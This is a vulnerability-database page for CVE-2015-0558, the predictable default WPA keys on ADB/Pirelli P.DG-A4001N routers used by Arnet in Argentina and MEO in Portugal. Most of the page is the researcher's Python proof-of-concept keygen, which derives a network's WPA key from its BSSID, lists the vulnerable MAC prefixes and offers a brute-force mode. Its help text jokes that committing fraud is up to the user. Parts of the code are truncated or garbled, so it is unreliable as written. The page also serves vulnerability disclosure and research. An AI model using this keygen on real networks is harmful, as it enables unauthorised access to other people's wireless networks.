ADB P.DGA4001N router 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1208647 漏洞类型 其他
发布时间 2015-05-09 更新时间 2020-01-21
CVE编号 CVE-2015-0558 CNNVD-ID CNNVD-202001-443
漏洞平台 N/A CVSS评分 N/A
ADB P.DGA4001N是一款调制解调器产品。 使用PDG_TEF_SP_4.06L.6版本固件的ADB P.DGA4001N(其他路由也可能受到影响)中存在安全漏洞,该漏洞源于程序使用了默认的WPA密钥生成算法。目前尚无此漏洞的相关信息,请随时关注CNNVD或厂商公告。
#!/usr/bin/env python
# -*- coding: utf-8 -*-

@license: GPLv3
@author : Eduardo Novella 
@contact: ednolo[a] 
@twitter: @enovella_ 

[*] Target      : 
Vendor           : ADB broadband Pirelli
Router           : Model P.DG-A4001N
ISP              : Arnet Telecom Argentina, MEO Portugal
Possible-targets :
Firmware         : (ARG)   

[*] References  : 
[0] [AUSTRIA]   A1/Telekom Austria PRG EAV4202N Default WPA Key Algorithm Weakness
[1] [ITALY]     Alice AGPF: The algorithm!                                  
[2] [ARGENTINA] CVE-2015-0558: Reverse-engineering the default WPA key generation
                algorithm for Pirelli routers in Argentina
[3] [PORTUGAL]                                                              

[*] Test vectors ARG : 

[*] Acknowledgements  : 
-> Thanks to fernando3k for giving me the firmware in order to do reverse-engineering on it , and christian32 for showing me a bunch of test vectors.
-> Thanks to Nicols Chaves for spotting a problem between WLAN, LAN mac addresses.
-> Thanks to Kara Davis for working with me in Portugal Pirelli

[*] Timeline    : 
2014-09-11  Found the algorithm
2014-09-12  Send a message to @ArnetOnline via Twitter @enovella_
2014-09-15  Send a message via website, still looking for a simple mail (
2014-09-16  Send another message to Arnet via website. First reply via twitter where they redirect me to the website form.
2014-09-19  Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20  More twitter PM about the same. They do not want to be aware about the problem though.
2014-09-23  I assume that Arnet does not care about its clients' security at all regarding its little interest.
2014-09-24  I send the problem to the vendor ADB Pirelli via website form
2014-09-28  I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05  Full disclosure and CVE-2015-0558 assigned

2015-04-01  I receive an email confirming that the Portuguese ISP "MEO" uses the same algorithm  
2015-04-05  Send a message to @MEOpt via Twitter @enovella_
2015-04-05  I got response in matter of minutes \o/
2015-04-05  I send an email to , stating the reference 3-78405621289 in email subject
2015-05-07  Full disclosure

[*] Changelog   : 
2015-05-06   v1.4         Added MEO routers in Portugal. Essid ADSLPT-ABXXXXX
2015-02-01   v1.3         Final version, hopefully
2015-01-12   v1.2         Confusion between LAN  and WLAN mac address
2015-01-10   v1.1         --allKeys flag added 
2014-09-11   v1.0         First PoC working


import re
import sys
import hashlib
import argparse

VERSION     = 1
DATEVERSION = '2015-05-06' 
URL         = ''

def genkey(mac,stdout='True'):
    seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +

    lookup  = '0123456789abcdefghijklmnopqrstuvwxyz'

    sha256 = hashlib.sha256()

    digest = bytearray(sha256.digest())

    if (stdout):
        print "[+] SHA256  : %s" % sha256.hexdigest()
    return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])

def printTargets():
        print "[+] Possible vulnerable targets so far:"
        for t in targets:
            print ("\t bssid: {0:s}:XX:XX:XX \t essid: WiFi-Arnet-XXXX, ADSLPT-ABXXXXX".format(t.upper()))


def checkTargets(bssid):
        supported = False
        for t in targets:
            if ( bssid.upper().startswith(t) ):
                supported = True
        if (not supported):
            print "[!] Your bssid looks like not supported! Generating anyway."

def addIncToMac(mac_str, inc):
        mac = bytearray.fromhex('%012x' %(int(mac_str,16) + inc))
        sys.exit('[!] Use real input :)')
    return mac

def main():
    global targets
    version = " {0:d}.{1:d}  [{2:s}] ----> {3:s}".format(VERSION,SUBVERSION,DATEVERSION,URL) 
    targets = ['00:08:27','00:13:C8','00:17:C2','00:19:3E','00:1C:A2','00:1D:8B','00:22:33','00:8C:54',
    parser = argparse.ArgumentParser(description='''>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina and
                                                 MEO in Portugal. So far only WiFi networks with essids like WiFi-Arnet-XXXX
                                                 or ADSLPT-ABXXXXX and manufactured by Pirelli are likely vulnerable. See 
                                        for more details. Twitter: @enovella_  and   
                                                 email: ednolo[at] This software is used just as proof-of-concept,
                                                 commit fraud depends on you!   ''',
                                                 epilog='''(+) Help: python %s -b 74:88:8B:AD:C0:DE ''' %(sys.argv[0])
    maingroup = parser.add_argument_group(title='required')
    maingroup.add_argument('-b','--bssid', type=str, nargs='?', help='Target mac address')
    parser.add_argument('-v', '--version', action='version', version='%(prog)s'+version)
    command_group = parser.add_mutually_exclusive_group()
    command_group.add_argument('-l','--list', help='List all vulnerable targets', action='store_true')
    command_group.add_argument('-a','--allkeys', help='Bruteforce mode', action="store_true")
    args = parser.parse_args()

    if args.list:
    elif args.bssid:
        mac_str = re.sub(r'[^a-fA-F0-9]', '', args.bssid)
        if len(mac_str) != 12:
            sys.exit('[!] Check MAC format!\n')  
            print '[+] MAC     : %s' % args.bssid

            if (args.allkeys):
                print '\n[+] WPA keys for SSID: WiFi-Arnet-XXXX (Argentina)'
                for i in xrange(-2,5):
                    mac = addIncToMac(mac_str,i)
                    print '%-10s' % ((genkey(mac, False)))

                print '\n[+] WPA keys for SSID: ADSLPT-ABXXXXX  (Portugal)'
                for i in xrange(-2,5):
                    mac = addIncToMac(mac_str,i)
                    print '%-10s' % ((genkey(mac, False)[:8]))
                wpa = genkey((addIncToMac(mac_str,0)), False)
                print '[+] WPA key : %-10s\t%-10s' % (wpa,     "SSID: WiFi-Arnet-XXXX (Argentina)") 
                print '[+] WPA key : %-10s\t%-10s' % (wpa[:8], "SSID: ADSLPT-ABXXXXX  (Portugal)" ) 

            sys.exit('[!] Are you trying to crash me? :)')

if __name__ == "__main__":